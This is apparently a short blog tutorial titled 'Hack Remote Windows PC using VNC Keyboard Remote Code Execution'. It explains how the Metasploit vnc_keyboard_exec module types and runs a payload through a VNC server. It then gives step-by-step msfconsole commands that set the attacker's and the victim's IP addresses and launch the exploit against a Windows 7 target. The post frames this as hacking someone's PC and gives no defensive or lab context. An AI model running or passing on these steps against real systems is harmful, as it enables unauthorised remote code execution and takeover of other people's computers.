Hack Remote Windows PC using VNC Keyboard Remote Code Execution

This module exploits VNC servers by sending virtual keyboard keys and executing a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager payload is typed and executed. On Unix/Linux systems a xterm terminal is opened and a payload is typed and executed.

Exploit Targets
VNC Viewer

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/vnc/vnc_keyboard_exec
msf exploit (vnc_keyboard_exec)>set lhost 192.168.1.4 (IP of Local Host)
msf exploit (vnc_keyboard_exec)>set rhost 192.168.1.3 (IP of Remote Host)
msf exploit (vnc_keyboard_exec)>exploit

0 comments:

Post a Comment